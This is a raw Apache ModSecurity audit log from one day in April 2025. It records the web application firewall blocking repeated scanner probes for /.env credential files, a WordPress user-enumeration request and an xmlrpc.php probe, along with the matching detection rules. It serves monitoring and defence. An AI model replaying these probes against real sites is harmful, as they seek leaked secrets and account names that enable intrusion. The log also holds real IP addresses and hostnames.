Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745995851855529 867 (- - -)
Stopwatch2: 1745995851855529 867; combined=386, p1=330, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e80f0276-Z--
--2b9f3222-A--
[30/Apr/2025:14:33:32 +0700] aBHSTNmPDA_SdVd56wA60wAAANU 103.236.140.4 34840 103.236.140.4 8181
--2b9f3222-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.144.212.193
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.144.212.193
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--2b9f3222-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b9f3222-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745998412444353 817 (- - -)
Stopwatch2: 1745998412444353 817; combined=324, p1=284, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b9f3222-Z--
--e5a9f70f-A--
[30/Apr/2025:15:08:30 +0700] aBHaftBN0baiHx4WjiaiGwAAAEI 103.236.140.4 43178 103.236.140.4 8181
--e5a9f70f-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 165.22.34.189
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 165.22.34.189
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--e5a9f70f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e5a9f70f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746000510965561 815 (- - -)
Stopwatch2: 1746000510965561 815; combined=363, p1=325, p2=0, p3=0, p4=0, p5=38, sr=134, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5a9f70f-Z--
--6b846466-A--
[30/Apr/2025:15:26:31 +0700] aBHet9mPDA_SdVd56wA96wAAAMY 103.236.140.4 47446 103.236.140.4 8181
--6b846466-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Accept-Charset: utf-8
--6b846466-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6b846466-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746001591815325 781 (- - -)
Stopwatch2: 1746001591815325 781; combined=317, p1=278, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6b846466-Z--
--d956cc6a-A--
[30/Apr/2025:16:09:35 +0700] aBHoz9mPDA_SdVd56wBAywAAAMw 103.236.140.4 57498 103.236.140.4 8181
--d956cc6a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 178.62.87.47
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 178.62.87.47
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--d956cc6a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d956cc6a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746004175665608 769 (- - -)
Stopwatch2: 1746004175665608 769; combined=354, p1=317, p2=0, p3=0, p4=0, p5=36, sr=121, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d956cc6a-Z--
--0fd6d660-A--
[30/Apr/2025:16:50:03 +0700] aBHyS9BN0baiHx4Wjiam8gAAAEc 103.236.140.4 38782 103.236.140.4 8181
--0fd6d660-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--0fd6d660-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0fd6d660-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746006603508402 769 (- - -)
Stopwatch2: 1746006603508402 769; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0fd6d660-Z--
--b4a1ce5a-A--
[30/Apr/2025:16:50:26 +0700] aBHyYj1td-6YjlnYDRLXWQAAAAE 103.236.140.4 38872 103.236.140.4 8181
--b4a1ce5a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--b4a1ce5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b4a1ce5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746006626156452 738 (- - -)
Stopwatch2: 1746006626156452 738; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b4a1ce5a-Z--
--d11b4c06-A--
[30/Apr/2025:17:19:18 +0700] aBH5JtBN0baiHx4WjiaosQAAAFc 103.236.140.4 45602 103.236.140.4 8181
--d11b4c06-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--d11b4c06-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d11b4c06-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746008358770909 831 (- - -)
Stopwatch2: 1746008358770909 831; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d11b4c06-Z--
--f25aa07c-A--
[30/Apr/2025:17:20:05 +0700] aBH5VTsHLQ2TK6eM3eqFswAAAI0 103.236.140.4 45810 103.236.140.4 8181
--f25aa07c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.73.211
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.73.211
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--f25aa07c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f25aa07c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746008405318868 791 (- - -)
Stopwatch2: 1746008405318868 791; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f25aa07c-Z--
--f20f4423-A--
[30/Apr/2025:18:12:05 +0700] aBIFhdmPDA_SdVd56wBHMwAAAMw 103.236.140.4 58196 103.236.140.4 8181
--f20f4423-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 207.154.212.47
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 207.154.212.47
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--f20f4423-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f20f4423-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746011525320655 754 (- - -)
Stopwatch2: 1746011525320655 754; combined=321, p1=283, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f20f4423-Z--
--c649c62d-A--
[30/Apr/2025:18:23:03 +0700] aBIIF9mPDA_SdVd56wBIPwAAAMY 103.236.140.4 60788 103.236.140.4 8181
--c649c62d-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 164.90.208.56
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 164.90.208.56
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--c649c62d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c649c62d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746012183392164 816 (- - -)
Stopwatch2: 1746012183392164 816; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c649c62d-Z--
--837a5663-A--
[30/Apr/2025:19:31:08 +0700] aBIYDNBN0baiHx4Wjia0uAAAAFM 103.236.140.4 58584 103.236.140.4 8181
--837a5663-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 159.65.18.197
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 159.65.18.197
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--837a5663-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--837a5663-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746016268298955 718 (- - -)
Stopwatch2: 1746016268298955 718; combined=296, p1=255, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--837a5663-Z--
--c2737049-A--
[30/Apr/2025:19:35:54 +0700] aBIZKj1td-6YjlnYDRLnAQAAABg 103.236.140.4 45722 103.236.140.4 8181
--c2737049-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.87.227
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.87.227
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--c2737049-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c2737049-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746016554826075 2683 (- - -)
Stopwatch2: 1746016554826075 2683; combined=1256, p1=406, p2=824, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c2737049-Z--
--4208db7f-A--
[30/Apr/2025:19:36:10 +0700] aBIZOtBN0baiHx4Wjia4YQAAAEo 103.236.140.4 46542 103.236.140.4 8181
--4208db7f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.87.227
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.87.227
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--4208db7f-C--
demo.sayHello
--4208db7f-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4208db7f-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746016570357093 5822 (- - -)
Stopwatch2: 1746016570357093 5822; combined=4364, p1=646, p2=3511, p3=26, p4=30, p5=86, sr=111, sw=65, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4208db7f-Z--
--7a82c55e-A--
[30/Apr/2025:19:39:21 +0700] aBIZ-T1td-6YjlnYDRLqQwAAAAk 103.236.140.4 56922 103.236.140.4 8181
--7a82c55e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.224
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.224
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
--7a82c55e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7a82c55e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746016761004368 689 (- - -)
Stopwatch2: 1746016761004368 689; combined=275, p1=233, p2=0, p3=0, p4=0, p5=42, sr=54, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7a82c55e-Z--
--8977db35-A--
[30/Apr/2025:19:39:35 +0700] aBIaBz1td-6YjlnYDRLqlQAAABg 103.236.140.4 57784 103.236.140.4 8181
--8977db35-B--
GET /test/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.224
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.224
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
--8977db35-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8977db35-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746016775716861 778 (- - -)
Stopwatch2: 1746016775716861 778; combined=351, p1=314, p2=0, p3=0, p4=0, p5=37, sr=125, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8977db35-Z--
--42947178-A--
[30/Apr/2025:20:10:19 +0700] aBIhO9BN0baiHx4WjibT1QAAAEo 103.236.140.4 44320 103.236.140.4 8181
--42947178-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 164.92.244.132
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 164.92.244.132
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--42947178-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--42947178-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746018619743276 793 (- - -)
Stopwatch2: 1746018619743276 793; combined=292, p1=253, p2=0, p3=0, p4=0, p5=39, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--42947178-Z--
--e7f43768-A--
[30/Apr/2025:20:13:29 +0700] aBIh-dmPDA_SdVd56wBzwQAAANg 103.236.140.4 54620 103.236.140.4 8181
--e7f43768-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 147.182.149.75
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 147.182.149.75
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--e7f43768-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e7f43768-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746018809974968 726 (- - -)
Stopwatch2: 1746018809974968 726; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e7f43768-Z--
--16838239-A--
[30/Apr/2025:20:28:25 +0700] aBIledmPDA_SdVd56wB_4wAAANY 103.236.140.4 46560 103.236.140.4 8181
--16838239-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0
Accept-Charset: utf-8
--16838239-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--16838239-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746019705009353 761 (- - -)
Stopwatch2: 1746019705009353 761; combined=318, p1=276, p2=0, p3=0, p4=0, p5=41, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--16838239-Z--
--33304a59-A--
[30/Apr/2025:21:00:43 +0700] aBItC9mPDA_SdVd56wCb6gAAAMA 103.236.140.4 38484 103.236.140.4 8181
--33304a59-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 178.62.87.47
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 178.62.87.47
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--33304a59-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33304a59-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746021643125226 527 (- - -)
Stopwatch2: 1746021643125226 527; combined=220, p1=194, p2=0, p3=0, p4=0, p5=26, sr=47, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33304a59-Z--
--43e63d04-A--
